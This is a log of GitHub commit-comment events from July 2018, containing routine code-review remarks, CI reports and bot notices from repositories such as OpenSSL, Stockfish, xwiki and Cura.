{"id":"7937424273","type":"CommitCommentEvent","actor":{"login":"lovrot"},"repo":{"name":"lovrot/misc-examples-pam50"},"payload":{"comment":{"id":29641268,"position":34,"line":20,"path":"munge/02-A-munge-mainz.R","commit_id":"8c9d456eeb41c0d19047ba1ae5fd4011f6063ba2","created_at":"2018-07-09T12:51:31Z","updated_at":"2018-07-09T12:51:31Z","author_association":"OWNER","body":"I opened an issue, see https://github.com/lovrot/misc-examples-pam50/issues/1#issuecomment-403467525"}},"created_at":"2018-07-09T12:51:31Z"}
{"id":"7937425881","type":"CommitCommentEvent","actor":{"login":"philippjfr"},"repo":{"name":"pyviz/pyviz"},"payload":{"comment":{"id":29641273,"position":null,"line":null,"path":null,"commit_id":"378b2e80acfeb4f2dc04c7cdced9482ccff8b200","created_at":"2018-07-09T12:51:49Z","updated_at":"2018-07-09T12:51:49Z","author_association":"COLLABORATOR","body":"Yeah, did you just search and replace @jlstevens? Everything except the pyviz link should use https and pyviz.org should be fixed."}},"created_at":"2018-07-09T12:51:49Z"}
{"id":"7937429784","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29641287,"position":null,"line":null,"path":null,"commit_id":"98c674cfd847983fa17c15c2c95110531b577d4a","created_at":"2018-07-09T12:52:34Z","updated_at":"2018-07-09T12:52:34Z","author_association":"OWNER","body":"I think that the intent is that a bunch of labels be created as independent entities 'first', and then used in creating chunks, rather than inlining them."}},"created_at":"2018-07-09T12:52:34Z"}
{"id":"7937431858","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.z3cform"},"payload":{"comment":{"id":29641291,"position":null,"line":null,"path":null,"commit_id":"2a1a8db895384fe33a3d330235c5585497eac678","created_at":"2018-07-09T12:52:58Z","updated_at":"2018-07-09T12:52:58Z","author_association":"NONE","body":"@tomgross Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.app.z3cform/113/violations\n```\nplone/app/z3cform/inline_validation.py:15:5: C901 'InlineValidationView.__call__' is too complex (15)\nplone/app/z3cform/widget.py:5:1: I001 isort found an import in the wrong position\nplone/app/z3cform/widget.py:667:19: T000 Todo note found.\nplone/app/z3cform/widget.py:681:47: T000 Todo note found.\nplone/app/z3cform/converters.py:107:11: T000 Todo note found.\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-09T12:52:58Z"}
{"id":"7937433223","type":"CommitCommentEvent","actor":{"login":"AryanPatidar"},"repo":{"name":"Havoc-Devices/android_device_xiaomi_rolex"},"payload":{"comment":{"id":29641293,"position":null,"line":null,"path":null,"commit_id":"f8903c7dc7d8b49baa04733bba5694b81dc0a9da","created_at":"2018-07-09T12:53:14Z","updated_at":"2018-07-09T12:53:14Z","author_association":"COLLABORATOR","body":"Thnx to SkullShady"}},"created_at":"2018-07-09T12:53:14Z"}
{"id":"7937433853","type":"CommitCommentEvent","actor":{"login":"philippjfr"},"repo":{"name":"pyviz/pyviz"},"payload":{"comment":{"id":29641295,"position":null,"line":null,"path":null,"commit_id":"378b2e80acfeb4f2dc04c7cdced9482ccff8b200","created_at":"2018-07-09T12:53:21Z","updated_at":"2018-07-09T12:53:21Z","author_association":"COLLABORATOR","body":"The PyViz.org https issue is due to a missing configuration in the DNS record: see https://help.github.com/articles/troubleshooting-custom-domains for reference."}},"created_at":"2018-07-09T12:53:21Z"}
{"id":"7937434704","type":"CommitCommentEvent","actor":{"login":"AryanPatidar"},"repo":{"name":"Havoc-Devices/android_device_xiaomi_rolex"},"payload":{"comment":{"id":29641300,"position":null,"line":null,"path":null,"commit_id":"673b1251fcd26d3a6669fc402c931ef38d8e3a1a","created_at":"2018-07-09T12:53:30Z","updated_at":"2018-07-09T12:53:30Z","author_association":"COLLABORATOR","body":"Thnx to SkullShady"}},"created_at":"2018-07-09T12:53:30Z"}
{"id":"7937436597","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29641304,"position":null,"line":null,"path":null,"commit_id":"973abf52304b454e8f2220a11aa8b6c6512c44fb","created_at":"2018-07-09T12:53:51Z","updated_at":"2018-07-09T12:53:51Z","author_association":"NONE","body":"Ah. okay. I tried with `clang-cl -Wundef` and since `clang-cl` (since forever?) also have `__attribute__((deprecated))`:\r\n\r\n```c\r\n#if defined(__clang__)\r\n# define DECLARE_DEPRECATED(f)   f __attribute__ ((deprecated));\r\n#elif __GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ > 0)\r\n#define OPENSSL_DEPRECATED __attribute__ ((deprecated))\r\n# define DECLARE_DEPRECATED(f)    f __attribute__ ((deprecated));\r\n#else\r\n# define DECLARE_DEPRECATED(f)   f;\r\n#endif\r\n```\r\n\r\nNo more clang warnings on that line."}},"created_at":"2018-07-09T12:53:51Z"}
{"id":"7937437295","type":"CommitCommentEvent","actor":{"login":"yesoreyeram"},"repo":{"name":"yesoreyeram/yesoreyeram-boomtable-panel"},"payload":{"comment":{"id":29641305,"position":null,"line":null,"path":null,"commit_id":"5492b11f3e9b2515fef43ca5a5a6f91843c83295","created_at":"2018-07-09T12:53:58Z","updated_at":"2018-07-09T12:53:58Z","author_association":"OWNER","body":"Closes #3 "}},"created_at":"2018-07-09T12:53:58Z"}
{"id":"7937439898","type":"CommitCommentEvent","actor":{"login":"yesoreyeram"},"repo":{"name":"yesoreyeram/yesoreyeram-boomtable-panel"},"payload":{"comment":{"id":29641315,"position":null,"line":null,"path":null,"commit_id":"a839472130f63bff87fb500a173b62977d3d16e4","created_at":"2018-07-09T12:54:26Z","updated_at":"2018-07-09T12:54:26Z","author_association":"OWNER","body":"Closes #1 "}},"created_at":"2018-07-09T12:54:26Z"}
{"id":"7937440582","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29641318,"position":null,"line":null,"path":null,"commit_id":"7bb8954df36fcf84681abaed3885f824fd448ed6","created_at":"2018-07-09T12:54:34Z","updated_at":"2018-07-09T12:54:34Z","author_association":"OWNER","body":"Because we've been working with a single monolithic package. Now that we have split it up into sub-packages, we need to be explicit about dependencies."}},"created_at":"2018-07-09T12:54:34Z"}
{"id":"7937453830","type":"CommitCommentEvent","actor":{"login":"tchichi"},"repo":{"name":"tchichi/openweek-blockly"},"payload":{"comment":{"id":29641336,"position":null,"line":null,"path":null,"commit_id":"ef8b33c81f6d79464f9b71cc1638327065870fb6","created_at":"2018-07-09T12:57:01Z","updated_at":"2018-07-09T12:57:01Z","author_association":"OWNER","body":"If you want to speed up the blocks evaluation, you need to modify this part of code in blocky.js: \r\n`self.timeout = window.setTimeout(function() {self.stepCode(self); }, `~~60~~` 20);`"}},"created_at":"2018-07-09T12:57:01Z"}
{"id":"7937454208","type":"CommitCommentEvent","actor":{"login":"sanshine2003"},"repo":{"name":"WebPlatformForEmbedded/meta-wpe"},"payload":{"comment":{"id":29641337,"position":null,"line":null,"path":null,"commit_id":"0e40853695370fe4722e9739ecad905521937b9a","created_at":"2018-07-09T12:57:06Z","updated_at":"2018-07-09T12:57:06Z","author_association":"NONE","body":"This change contains some unreadable characters. yocto build fails"}},"created_at":"2018-07-09T12:57:06Z"}
{"id":"7937458381","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641346,"position":null,"line":null,"path":null,"commit_id":"6131fe217a8a787e229409fc9e74868b1f2033bd","created_at":"2018-07-09T12:57:52Z","updated_at":"2018-07-09T12:57:52Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=442)"}},"created_at":"2018-07-09T12:57:52Z"}
{"id":"7937458468","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641347,"position":null,"line":null,"path":null,"commit_id":"6131fe217a8a787e229409fc9e74868b1f2033bd","created_at":"2018-07-09T12:57:53Z","updated_at":"2018-07-09T12:57:53Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:57:53Z"}
{"id":"7937464346","type":"CommitCommentEvent","actor":{"login":"lefuturiste"},"repo":{"name":"retrobox/web"},"payload":{"comment":{"id":29641359,"position":null,"line":null,"path":null,"commit_id":"cadda62d4089d8ff572d1fd0e3ecb2f7364bc242","created_at":"2018-07-09T12:59:00Z","updated_at":"2018-07-09T12:59:00Z","author_association":"MEMBER","body":"GG"}},"created_at":"2018-07-09T12:59:00Z"}
{"id":"7937472840","type":"CommitCommentEvent","actor":{"login":"gderiyenko"},"repo":{"name":"gderiyenko/boat24"},"payload":{"comment":{"id":29641383,"position":null,"line":null,"path":null,"commit_id":"6163b210a15c6b4014912fba70f2fe379f3048fc","created_at":"2018-07-09T13:00:33Z","updated_at":"2018-07-09T13:00:33Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [5. LIITU button in header- it will be login page for companies and persons that want to enter they cv.](https://trello.com/c/WrUkwVEU/5-5-liitu-button-in-header-it-will-be-login-page-for-companies-and-persons-that-want-to-enter-they-cv)"}},"created_at":"2018-07-09T13:00:33Z"}
{"id":"7937477731","type":"CommitCommentEvent","actor":{"login":"paulina-bukowska"},"repo":{"name":"paulina-bukowska/my_testing"},"payload":{"comment":{"id":29641394,"position":null,"line":null,"path":null,"commit_id":"3e7a1ecc5970d583677f76b013ca5c4087f2d94f","created_at":"2018-07-09T13:01:27Z","updated_at":"2018-07-09T13:01:27Z","author_association":"OWNER","body":"**Task description**\r\n\r\nYou are given N counters, initially set to 0, and you have two possible operations on them:\r\n\r\nincrease(X) − counter X is increased by 1,\r\nmax counter − all counters are set to the maximum value of any counter.\r\nA non-empty array A of M integers is given. This array represents consecutive operations:\r\n\r\nif A[K] = X, such that 1 ≤ X ≤ N, then operation K is increase(X),\r\nif A[K] = N + 1 then operation K is max counter.\r\nFor example, given integer N = 5 and array A such that:\r\n\r\n    A[0] = 3\r\n    A[1] = 4\r\n    A[2] = 4\r\n    A[3] = 6\r\n    A[4] = 1\r\n    A[5] = 4\r\n    A[6] = 4\r\nthe values of the counters after each consecutive operation will be:\r\n\r\n    (0, 0, 1, 0, 0)\r\n    (0, 0, 1, 1, 0)\r\n    (0, 0, 1, 2, 0)\r\n    (2, 2, 2, 2, 2)\r\n    (3, 2, 2, 2, 2)\r\n    (3, 2, 2, 3, 2)\r\n    (3, 2, 2, 4, 2)\r\nThe goal is to calculate the value of every counter after all operations.\r\n\r\nWrite a function:\r\n\r\nclass Solution { public int[] solution(int N, int[] A); }\r\n\r\nthat, given an integer N and a non-empty array A consisting of M integers, returns a sequence of integers representing the values of the counters.\r\n\r\nThe sequence should be returned as:\r\n\r\na structure Results (in C), or\r\na vector of integers (in C++), or\r\na record Results (in Pascal), or\r\nan array of integers (in any other programming language).\r\nFor example, given:\r\n\r\n    A[0] = 3\r\n    A[1] = 4\r\n    A[2] = 4\r\n    A[3] = 6\r\n    A[4] = 1\r\n    A[5] = 4\r\n    A[6] = 4\r\nthe function should return [3, 2, 2, 4, 2], as explained above.\r\n\r\nAssume that:\r\n\r\nN and M are integers within the range [1..100,000];\r\neach element of array A is an integer within the range [1..N + 1].\r\nComplexity:\r\n\r\nexpected worst-case time complexity is O(N+M);\r\nexpected worst-case space complexity is O(N) (not counting the storage required for input arguments)."}},"created_at":"2018-07-09T13:01:27Z"}
{"id":"7937484414","type":"CommitCommentEvent","actor":{"login":"charbelsako"},"repo":{"name":"charbelsako/pacman"},"payload":{"comment":{"id":29641414,"position":null,"line":null,"path":null,"commit_id":"69ac96ff2148a0f18efce58b164443f8938caac6","created_at":"2018-07-09T13:02:41Z","updated_at":"2018-07-09T13:02:41Z","author_association":"OWNER","body":"Cells that didn't originally have coins in them were getting coins because of `resetGame` function. Added 2 if statement to solve this"}},"created_at":"2018-07-09T13:02:41Z"}
{"id":"7937485892","type":"CommitCommentEvent","actor":{"login":"charbelsako"},"repo":{"name":"charbelsako/pacman"},"payload":{"comment":{"id":29641417,"position":null,"line":null,"path":null,"commit_id":"69ac96ff2148a0f18efce58b164443f8938caac6","created_at":"2018-07-09T13:02:58Z","updated_at":"2018-07-09T13:02:58Z","author_association":"OWNER","body":"Also added a game speed slider."}},"created_at":"2018-07-09T13:02:58Z"}
{"id":"7937486479","type":"CommitCommentEvent","actor":{"login":"kostyrev"},"repo":{"name":"synhershko/elasticsearch-cloud-deploy"},"payload":{"comment":{"id":29641421,"position":5,"line":48,"path":"terraform-aws/masters.tf","commit_id":"02fa1ae510ec5e3f0470fec0d55bf06eb46d8ac7","created_at":"2018-07-09T13:03:05Z","updated_at":"2018-07-09T13:03:05Z","author_association":"CONTRIBUTOR","body":"why?  \r\nwhat if users of your module have a lots of subnets (some public and some private)?"}},"created_at":"2018-07-09T13:03:05Z"}
{"id":"7937487215","type":"CommitCommentEvent","actor":{"login":"evalica"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29641424,"position":7,"line":15,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/test/resources/filter/documentwithattachmentwithoutdate.xml","commit_id":"9840046e7b84d5f0102798f264e28fdf9280ca00","created_at":"2018-07-09T13:03:12Z","updated_at":"2018-07-09T13:03:12Z","author_association":"MEMBER","body":"Shouldn't this be 'text/plain' ?"}},"created_at":"2018-07-09T13:03:12Z"}
{"id":"7937492400","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29641438,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-09T13:04:11Z","updated_at":"2018-07-09T13:04:11Z","author_association":"CONTRIBUTOR","body":"Indeed, a bug report should be filed – unfortunately, bug.php.net appears to be unavailable presently."}},"created_at":"2018-07-09T13:04:11Z"}
{"id":"7937492544","type":"CommitCommentEvent","actor":{"login":"LipuFei"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29641439,"position":22,"line":56,"path":"cura/Settings/ContainerManager.py","commit_id":"77bd6cf749e479d51570bbe5892593916edd72a0","created_at":"2018-07-09T13:04:12Z","updated_at":"2018-07-09T13:04:12Z","author_association":"CONTRIBUTOR","body":"This should be `if sub_entry:` because this doesn't include the None case."}},"created_at":"2018-07-09T13:04:12Z"}
{"id":"7937492995","type":"CommitCommentEvent","actor":{"login":"netGlobe"},"repo":{"name":"kevalpatel2106/android-hidden-camera"},"payload":{"comment":{"id":29641440,"position":null,"line":null,"path":null,"commit_id":"8fc5634993bd58e8eafd49a386798ec959ed4bfc","created_at":"2018-07-09T13:04:17Z","updated_at":"2018-07-09T13:04:17Z","author_association":"NONE","body":"thanks a lot"}},"created_at":"2018-07-09T13:04:17Z"}
{"id":"7937493165","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29641441,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T13:04:19Z","updated_at":"2018-07-09T13:04:19Z","author_association":"NONE","body":"@vondele Yes, testing a skip-scheme in all it's use-cases was and is still today a very difficult terrain.\r\nMoreover from my experience SMP-tests were always carried by lot of noise, especially with hyperthreading on.\r\nI'm not stating current scheme is optimal, but I think it's very hard to improve on (in terms of 0,4 bounds).\r\nFor the [0,3] bounds case I'm aware about the difficulty of passing multiple simplification attempts.\r\nIt's also for this I'm wondering if all this effort (how many kilowatt hours do we have already spent at this test series?) is worth for the sake of having a more compact code with less instructions which comes with even a small risk of regression?\r\n"}},"created_at":"2018-07-09T13:04:19Z"}
{"id":"7937493175","type":"CommitCommentEvent","actor":{"login":"suda"},"repo":{"name":"particle-iot/lightship"},"payload":{"comment":{"id":29641442,"position":null,"line":null,"path":null,"commit_id":"480ee7faf096043421720b1755ae19bb681e3115","created_at":"2018-07-09T13:04:19Z","updated_at":"2018-07-09T13:04:19Z","author_association":"MEMBER","body":"That's great! I can confirm the latest Lightship works! We'll remove this fork then. Thanks Gajus!"}},"created_at":"2018-07-09T13:04:19Z"}
{"id":"7937499143","type":"CommitCommentEvent","actor":{"login":"henrytill"},"repo":{"name":"rchain/rchain"},"payload":{"comment":{"id":29641453,"position":10,"line":106,"path":"rspace/src/main/scala/coop/rchain/rspace/ReplayRSpace.scala","commit_id":"913553245665086ba361b93f53220af7038a5fa3","created_at":"2018-07-09T13:05:25Z","updated_at":"2018-07-09T13:05:25Z","author_association":"COLLABORATOR","body":"Yes, it is okay to throw.\r\n\r\nHowever, I agree with @goral09 here.  It seems like we could check for emptiness in the body of the match case before iterating through `comms` below and save ourselves from having to write an additional method here."}},"created_at":"2018-07-09T13:05:25Z"}
{"id":"7937504892","type":"CommitCommentEvent","actor":{"login":"charbelsako"},"repo":{"name":"charbelsako/pacman"},"payload":{"comment":{"id":29641459,"position":null,"line":null,"path":null,"commit_id":"69ac96ff2148a0f18efce58b164443f8938caac6","created_at":"2018-07-09T13:06:29Z","updated_at":"2018-07-09T13:06:29Z","author_association":"OWNER","body":"Adds Enhancement #23 . Fixes Bug #24"}},"created_at":"2018-07-09T13:06:29Z"}
{"id":"7937510580","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29641470,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-09T13:07:33Z","updated_at":"2018-07-09T13:07:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T13:07:33Z"}
{"id":"7937510716","type":"CommitCommentEvent","actor":{"login":"ehmry"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":29641471,"position":null,"line":null,"path":null,"commit_id":"911e3fcf37ec5723dcf401b7c0056f0299bf02a4","created_at":"2018-07-09T13:07:35Z","updated_at":"2018-07-09T13:07:35Z","author_association":"CONTRIBUTOR","body":"Looks good to me :+1: "}},"created_at":"2018-07-09T13:07:35Z"}
{"id":"7937517356","type":"CommitCommentEvent","actor":{"login":"agriggio"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29641482,"position":null,"line":null,"path":null,"commit_id":"eeebe587ba4a899a10972c23a8e630ffa012e5d7","created_at":"2018-07-09T13:08:45Z","updated_at":"2018-07-09T13:08:45Z","author_association":"COLLABORATOR","body":"ok, understood. I have no further question then! :+1: "}},"created_at":"2018-07-09T13:08:45Z"}
{"id":"7937522007","type":"CommitCommentEvent","actor":{"login":"krv90"},"repo":{"name":"AlexanderKosarev/Vandals"},"payload":{"comment":{"id":29641486,"position":20,"line":19,"path":"vandals/Controllers/HomeController.cs","commit_id":"c4aaa7de74991dbd4caf9015ddd30df31821ff6e","created_at":"2018-07-09T13:09:33Z","updated_at":"2018-07-09T13:09:33Z","author_association":"NONE","body":"Механизм MVC предполагает передачу модели непосредственно во View. \r\nТак будет работать, но подобный код хуже в поддержке"}},"created_at":"2018-07-09T13:09:33Z"}
{"id":"7937525755","type":"CommitCommentEvent","actor":{"login":"phagleb"},"repo":{"name":"slmatthew/phagleb.github.io"},"payload":{"comment":{"id":29641496,"position":null,"line":null,"path":null,"commit_id":"2b1170d1b11cf70b5521cbb857269d79a2a5a423","created_at":"2018-07-09T13:10:12Z","updated_at":"2018-07-09T13:10:12Z","author_association":"NONE","body":"no"}},"created_at":"2018-07-09T13:10:12Z"}
{"id":"7937531827","type":"CommitCommentEvent","actor":{"login":"krv90"},"repo":{"name":"AlexanderKosarev/Vandals"},"payload":{"comment":{"id":29641503,"position":19,"line":19,"path":"vandals/Models/GraffitiRepository.cs","commit_id":"c4aaa7de74991dbd4caf9015ddd30df31821ff6e","created_at":"2018-07-09T13:11:18Z","updated_at":"2018-07-09T13:11:18Z","author_association":"NONE","body":"Может, встретишь другое мнение, но можно сразу вернуть результат. Без объявления переменной.\r\nЧем меньше кода, тем он, как правило, понятней"}},"created_at":"2018-07-09T13:11:18Z"}
{"id":"7937533131","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29641506,"position":7,"line":15,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/test/resources/filter/documentwithattachmentwithoutdate.xml","commit_id":"9840046e7b84d5f0102798f264e28fdf9280ca00","created_at":"2018-07-09T13:11:32Z","updated_at":"2018-07-09T13:11:32Z","author_association":"MEMBER","body":"It can be anything. I could have put `somemimetype` instead of `image/png`."}},"created_at":"2018-07-09T13:11:32Z"}
{"id":"7937536581","type":"CommitCommentEvent","actor":{"login":"evalica"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29641511,"position":7,"line":15,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/test/resources/filter/documentwithattachmentwithoutdate.xml","commit_id":"9840046e7b84d5f0102798f264e28fdf9280ca00","created_at":"2018-07-09T13:12:10Z","updated_at":"2018-07-09T13:12:10Z","author_association":"MEMBER","body":"Still the name of the attachment is \"attachment.txt\". "}},"created_at":"2018-07-09T13:12:10Z"}
{"id":"7937538515","type":"CommitCommentEvent","actor":{"login":"krv90"},"repo":{"name":"AlexanderKosarev/Vandals"},"payload":{"comment":{"id":29641517,"position":25,"line":15,"path":"vandals/Views/Home/Index.cshtml","commit_id":"c4aaa7de74991dbd4caf9015ddd30df31821ff6e","created_at":"2018-07-09T13:12:29Z","updated_at":"2018-07-09T13:12:29Z","author_association":"NONE","body":"Если бы тут использовалась модель, то  работало бы автодополение кода)"}},"created_at":"2018-07-09T13:12:29Z"}
{"id":"7937539897","type":"CommitCommentEvent","actor":{"login":"Mayank-gozu"},"repo":{"name":"Mayank-gozu/Memory-Game"},"payload":{"comment":{"id":29641519,"position":2,"line":2,"path":"README.md","commit_id":"6f89fc66bda09fbd147cb2387736e92bceb6de4e","created_at":"2018-07-09T13:12:44Z","updated_at":"2018-07-09T13:12:44Z","author_association":"OWNER","body":"This Game needs CodeSkulptor to run ."}},"created_at":"2018-07-09T13:12:44Z"}
{"id":"7937540814","type":"CommitCommentEvent","actor":{"login":"Quix0r"},"repo":{"name":"singularity/singularity"},"payload":{"comment":{"id":29641522,"position":null,"line":null,"path":null,"commit_id":"4f2d4b7515da06c318440a32e9b960266582453b","created_at":"2018-07-09T13:12:54Z","updated_at":"2018-07-09T13:12:54Z","author_association":"CONTRIBUTOR","body":"Ah, lesser hard-coded stuff (SocioAnalytics) I think is this change about?"}},"created_at":"2018-07-09T13:12:54Z"}
{"id":"7937544132","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29641526,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T13:13:28Z","updated_at":"2018-07-09T13:13:28Z","author_association":"NONE","body":"After rebooting the machine, the timeout problem seems gone, even with 384 threads.\r\nSo probably it was because memory pages got fragmented over time."}},"created_at":"2018-07-09T13:13:28Z"}
{"id":"7937550495","type":"CommitCommentEvent","actor":{"login":"geisterfurz007"},"repo":{"name":"geisterfurz007/QueenReporter"},"payload":{"comment":{"id":29641533,"position":null,"line":null,"path":null,"commit_id":"f83c12cea208678fb571fba8bd815880a8e14caf","created_at":"2018-07-09T13:14:36Z","updated_at":"2018-07-09T13:14:36Z","author_association":"OWNER","body":"Closes and publishes #1 "}},"created_at":"2018-07-09T13:14:36Z"}
{"id":"7937553183","type":"CommitCommentEvent","actor":{"login":"polyluxus"},"repo":{"name":"polyluxus/tools-for-g16.bash"},"payload":{"comment":{"id":29641537,"position":null,"line":null,"path":null,"commit_id":"bf4ed6d50c1c0d8741c2e3c621be57bb611c713a","created_at":"2018-07-09T13:15:07Z","updated_at":"2018-07-09T13:15:07Z","author_association":"OWNER","body":"fix #13 "}},"created_at":"2018-07-09T13:15:07Z"}
{"id":"7937555835","type":"CommitCommentEvent","actor":{"login":"jordi9"},"repo":{"name":"mustaine/learning-tests"},"payload":{"comment":{"id":29641551,"position":null,"line":null,"path":null,"commit_id":"45f900589b1a057fc9389ff6657ca6ea0e7a217d","created_at":"2018-07-09T13:15:34Z","updated_at":"2018-07-09T13:15:34Z","author_association":"COLLABORATOR","body":":shipit: :shipit: LGTM :shipit: :shipit: \r\n"}},"created_at":"2018-07-09T13:15:34Z"}
{"id":"7937556037","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29641552,"position":null,"line":null,"path":null,"commit_id":"df7206e704d9bdc25e34ca04c0076e983181786b","created_at":"2018-07-09T13:15:36Z","updated_at":"2018-07-09T13:15:36Z","author_association":"CONTRIBUTOR","body":"@Sami32 Are you there?"}},"created_at":"2018-07-09T13:15:36Z"}
{"id":"7937557259","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29641553,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T13:15:49Z","updated_at":"2018-07-09T13:15:49Z","author_association":"OWNER","body":"@noobpwnftw problem is gone indeed. Really surprising to see that effect so strongly."}},"created_at":"2018-07-09T13:15:49Z"}
{"id":"7937560793","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29641563,"position":null,"line":null,"path":null,"commit_id":"df7206e704d9bdc25e34ca04c0076e983181786b","created_at":"2018-07-09T13:16:25Z","updated_at":"2018-07-09T13:16:25Z","author_association":"CONTRIBUTOR","body":"Yes ;)"}},"created_at":"2018-07-09T13:16:25Z"}
{"id":"7937561412","type":"CommitCommentEvent","actor":{"login":"krv90"},"repo":{"name":"AlexanderKosarev/Vandals"},"payload":{"comment":{"id":29641570,"position":2,"line":1,"path":"vandals/Scripts/site.js","commit_id":"c4aaa7de74991dbd4caf9015ddd30df31821ff6e","created_at":"2018-07-09T13:16:31Z","updated_at":"2018-07-09T13:16:31Z","author_association":"NONE","body":"Не нужно ругать JS. У этого языка своя философия и свое применение. Такое отношение ведет только к конфликтам с другими программистами. В нашей компании почти все бэкенд-программисты так или иначе могут писать на JS."}},"created_at":"2018-07-09T13:16:31Z"}
{"id":"7937562123","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29641571,"position":7,"line":15,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/test/resources/filter/documentwithattachmentwithoutdate.xml","commit_id":"9840046e7b84d5f0102798f264e28fdf9280ca00","created_at":"2018-07-09T13:16:39Z","updated_at":"2018-07-09T13:16:39Z","author_association":"MEMBER","body":"ok I'll fix it."}},"created_at":"2018-07-09T13:16:39Z"}
{"id":"7937564569","type":"CommitCommentEvent","actor":{"login":"lclausen-adi"},"repo":{"name":"analogdevicesinc/no-OS"},"payload":{"comment":{"id":29641581,"position":43,"line":432,"path":"fmcdaq2/fmcdaq2.c","commit_id":"20284e98906e07c475f33d90842e2420e69ebc21","created_at":"2018-07-09T13:17:04Z","updated_at":"2018-07-09T13:17:04Z","author_association":"NONE","body":"Please check this commit again."}},"created_at":"2018-07-09T13:17:04Z"}
{"id":"7937564802","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29641582,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T13:17:07Z","updated_at":"2018-07-09T13:17:07Z","author_association":"OWNER","body":"@pb00068 I see opportunity to test new schemes, now that we have 192/384 core machines available and waiting to pick up >=32 core tests specifically."}},"created_at":"2018-07-09T13:17:07Z"}
{"id":"7937567741","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641593,"position":null,"line":null,"path":null,"commit_id":"02550705afc417dc76ef1bcb2ff819938c79d795","created_at":"2018-07-09T13:17:38Z","updated_at":"2018-07-09T13:17:38Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=443)"}},"created_at":"2018-07-09T13:17:38Z"}
{"id":"7937567857","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641595,"position":null,"line":null,"path":null,"commit_id":"02550705afc417dc76ef1bcb2ff819938c79d795","created_at":"2018-07-09T13:17:39Z","updated_at":"2018-07-09T13:17:39Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T13:17:39Z"}
